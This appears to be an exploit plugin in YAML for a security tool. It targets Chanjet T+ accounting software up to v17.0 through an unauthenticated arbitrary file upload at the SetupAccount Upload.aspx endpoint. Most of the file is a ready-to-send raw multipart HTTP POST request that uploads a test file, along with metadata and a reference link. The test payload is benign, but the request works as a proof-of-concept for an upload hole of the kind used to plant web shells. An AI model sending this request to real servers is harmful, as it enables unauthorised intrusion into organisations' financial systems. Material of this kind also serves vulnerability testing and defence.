info:
    app: 畅捷通
    name: Upload
    author: lz520520
    plugin_version: 1.0.0
    disclosure_date: "2022-11-17"
    create_date: "2024-10-06 09:37:17"
    update_date: "2024-10-06 09:37:17"
    scope: 畅捷通 T+ <= v17.0
    description: 前台任意文件上传
    detail: /tplus/SM/SetupAccount/Upload.aspx
    payload: |+
        POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1
        Host: 10.211.55.12
        Content-Length: 185
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywE0rfFhEm1kBj3uW
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
        Accept-Encoding: gzip, deflate
        Connection: close

        ------WebKitFormBoundarywE0rfFhEm1kBj3uW
        Content-Disposition: form-data; name="File1"; filename="1.jpg"
        Content-Type: image/jpeg

        123
        ------WebKitFormBoundarywE0rfFhEm1kBj3uW--


    reference: https://www.cnblogs.com/bmjoker/p/16794685.html
    vul_type: 文件上传
payloads:
    - name: upload1
      alias: 文件上传
